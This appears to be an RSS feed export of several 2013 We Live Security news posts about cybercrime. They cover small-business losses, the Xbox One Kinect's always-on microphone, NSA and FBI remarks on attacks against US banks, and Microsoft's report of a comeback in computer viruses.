A report by the group found that 41 per cent of the FSB’s membership have been a victim of cybercrime in the past year. The most common threat is virus infections, with 20% of small businesses falling victim – while 8% have been victims of hacking and 5% have suffered security breaches.

In total, cybercrime costs small business £785 million ($1.1 billion) a year. But the Federation of Small Businesses says the cost to the wider economy could be even greater, as small businesses avoid using the internet for fear of cyber attacks. Previous FSB research shows that only a third of businesses with their own website use it for sales.

Small businesses are responding to the threat – 36% of respondents regularly install security patches, and six out of ten claim to regularly update antivirus software. Only 20% say they have taken no steps to protect themselves against cybercrime.

Mike Cherry, the National Policy Chairman, Federation of Small Businesses, said: “Small business cybercrime poses a real and growing threat and it isn’t something that should be ignored. Many businesses will be taking steps to protect themselves but the cost of crime can act as a barrier to growth.

“For example, many businesses will not embrace new technology as they fear the repercussions and do not believe they will get adequate protection from crime.”

]]>
Xbox One Kinect microphone “always on” security fears http://www.welivesecurity.com/2013/05/22/xbox-one-kinect-microphone/ http://www.welivesecurity.com/2013/05/22/xbox-one-kinect-microphone/#comments Wed, 22 May 2013 13:01:10 +0000 Editor http://www.welivesecurity.com/2013/05/22/xbox-one-kinect-microphone/ The Xbox One Kinect microphone – one of the hi-tech new features of Microsoft’s new Xbox One console – has raised security concerns since it “listens” to users even when the console is turned off.

The post Xbox One Kinect microphone “always on” security fears appeared first on We Live Security.

]]>
The Xbox One Kinect microphone – one of the hi-tech new features of Microsoft’s new console – has raised security concerns since it “listens” to users even when the console is turned off.

Technology site The Verge likened the new console to the Telescreen from 1984, saying that the Xbox One Kinect microphone function raised concerns about the information available if the machine were to be compromised by a malicious actor.

The function is part of the console’s Kinect controller, which is now part of the Xbox One package. The new Xbox One has voice and gesture control built into its operating system.

Saying, “Xbox on” to the Kinect will switch on the console – which means that the console must “listen” constantly for commands, even when supposedly switched off. At Microsoft’s launch event in Seattle, demonstrators described the peripheral as the “eyes and ears of the living room”.

The sensor offers a Full HD infrared view, and is so sensitive it can read users’ heartbeats via tremors and colour changes invisible to the naked eye.

The news raised concerns among fans. “I think it’s creepy that you can say ‘Xbox on’ and it will turn on. It means it’s always listening to you,” said one Twitter user.

The Verge suggested that the “always on” microphone could have serious implications for privacy – possibly more so even than Google Glass. “The new Xbox could pose greater privacy implications – especially if the system, which many users will connect to the internet, is compromised remotely by a malicious actor,” said the site.

]]>
Cyber attacks on America “will get worse”, warns NSA director http://www.welivesecurity.com/2013/05/21/cyber-attacks-on-america-will-get-worse/ http://www.welivesecurity.com/2013/05/21/cyber-attacks-on-america-will-get-worse/#comments Tue, 21 May 2013 12:43:17 +0000 Editor http://www.welivesecurity.com/2013/05/21/cyber-attacks-on-america-will-get-worse/ Cyber attacks on America will continue to escalate, according to National Security Director Keith Alexander, speaking to the Reuters Cybersecurity Summit in Washington. “Disruptive and destructive attacks on our country will get worse," said Alexander, the leading U.S. general in charge of the nation’s cybersecurity. "Mark my words, it will get worse."

The post Cyber attacks on America “will get worse”, warns NSA director appeared first on We Live Security.

]]>
Cyber attacks on America will continue to escalate, according to National Security Director Keith Alexander, speaking to the Reuters Cybersecurity Summit in Washington.

“Disruptive and destructive attacks on our country will get worse,” said Alexander, the leading U.S. general in charge of the nation’s cybersecurity. “Mark my words, it will get worse.”

Speaking at the Reuters Cybersecurity Summit in Washington last week, Alexander described cyber espionage as “the greatest transfer of wealth in history.”

U.S. Secretary of Homeland Security Janet Napolitano said at the same summit that her main concern was with “the known unknown”.

Napolitano said that the recent heist which used ATMs around the world to withdraw $45 million via prepaid debit cards offered an illustration of the scope of cybercrime. The attack targeted prepaid credit cards. By raising the limit on cloned cards the hackers were able to withdraw “unlimited” funds for short periods. In New York, the hackers withdrew $2.8 million in hours.

“We don’t have the identity of all the adversaries who are trying to either commit crimes or acts over the cyber networks,” said Napolitano. “The things we know about, we can deal with. It’s the known unknown.”

]]>
Computer viruses “are making a comeback”, says Microsoft http://www.welivesecurity.com/2013/05/21/computer-viruses-making-comeback/ http://www.welivesecurity.com/2013/05/21/computer-viruses-making-comeback/#comments Tue, 21 May 2013 09:11:18 +0000 Editor http://www.welivesecurity.com/2013/05/21/computer-viruses-making-comeback/ Computer viruses are making a comeback, according to Microsoft’s Director of Trustworthy Computing - with numbers rising globally in 2012. Tim Rains says that for several years, viruses have been “out of favour with attackers”, but points to statistics showing that they have made a comeback in 2012, at least in certain territories.

The post Computer viruses “are making a comeback”, says Microsoft appeared first on We Live Security.

]]>
Computer viruses are making a comeback, according to Microsoft’s Director of Trustworthy Computing – with numbers rising globally in 2012.

Tim Rains says that for several years, computer viruses have been “out of favour with attackers”, but points to statistics showing that they have made a comeback in 2012, at least in certain territories.

Writing on the Microsoft Security Blog, Rains says, “I have rarely seen the virus threat category found on more than 5 percent of systems with detections globally. But more recently I have noticed that viruses seem to be making a comeback. The relative prevalence of viruses has been trending up. The prevalence worldwide for the virus threat category was 7.8 percent in the fourth quarter of 2012.”

Rains says that for the past few years, “Viruses simply didn’t support the profit motive many attackers had in the same way that Trojan downloaders and droppers, miscellaneous Trojans, and password stealers and monitoring tools all did.” But new threats designed to steal information are sparking a comeback.

Rains says that computer viruses proliferate in countries with low levels of broadband penetration, such as Egypt, Indonesia and Ethiopia, where software is updated rarely, and infection rates can be as high as 40%.

Pointing to the success of Win32/Sality, a family of polymorphic file injectors found on 8,204,434 computers worldwide, Rains says, “Sality is one of the top five detections on Windows XP. Sality hasn’t been as successful on newer versions of Windows. Sality’s success proves that file infectors can still be successful. Unlike computer viruses from yesteryear, attackers today are trying to steal information, sometimes by turning on computers’ microphones and cameras.”

Rains says that defending against such threats is “relatively easy” – suggesting users update their system software frequently, and also run real-time antivirus, as well as using caution with removable media such as USB sticks and external hard drives.

]]>
FBI shares information on cyber attacks with US banks http://www.welivesecurity.com/2013/05/19/fbi-shares-info-on-cyber-attacks-with-us-banks/ http://www.welivesecurity.com/2013/05/19/fbi-shares-info-on-cyber-attacks-with-us-banks/#comments Sun, 19 May 2013 20:14:57 +0000 Editor http://www.welivesecurity.com/2013/05/19/fbi-shares-info-on-cyber-attacks-with-us-banks/ The FBI has offered temporary security clearances to security officers from U.S. banks in order to share information into repeated cyber attacks which have disrupted online banking websites in recent months.

The post FBI shares information on cyber attacks with US banks appeared first on We Live Security.

]]>
The FBI has offered temporary security clearances to officers from financial institutions in order to share information with US banks about the repeated cyber attacks which have disrupted online banking websites in recent months.

Bank security officers were invited to a classified video conference held at 40 FBI field offices around the country, according to FBI Executive Assistant Director Richard McFeely.

The video conference offered insight into “who was behind the keyboards,” according to McFeely, speaking at the Reuters Cybersecurity Summit.

Customer accounts have not been put at risk by the attacks – although the sustained DDoS attacks have meant it has been impossible to access bank websites. One NBC report claimed that the websites of 15 major banks were offline for a total of 249 hours in six weeks earlier this year.

Earlier this year President Barack Obama signed an executive order to improve information-sharing between companies and branches of government, saying, “We cannot look back years from now and wonder why we did nothing in the face of real threats to our security and our economy.”

Banks such as Wells Fargo and Bank of America were first attacked in September 2012, by a group calling itself Izz ad-Din al-Qassam Cyber Fighters. The attacks have continued since then. McFeely declined to discuss who was behind the attacks, or other details of the continuing investigation.

McFeely said that the one-day security clearances are part of an effort to communicate more effectively with victims of cybercrime, admitting that the agency had been “terrible” in the past. “That’s 180 degrees from where we are now,” McFeely said.

McFeely said, “The first time we bring someone in from out of the country in handcuffs, that’s going to be a big deal.”

]]>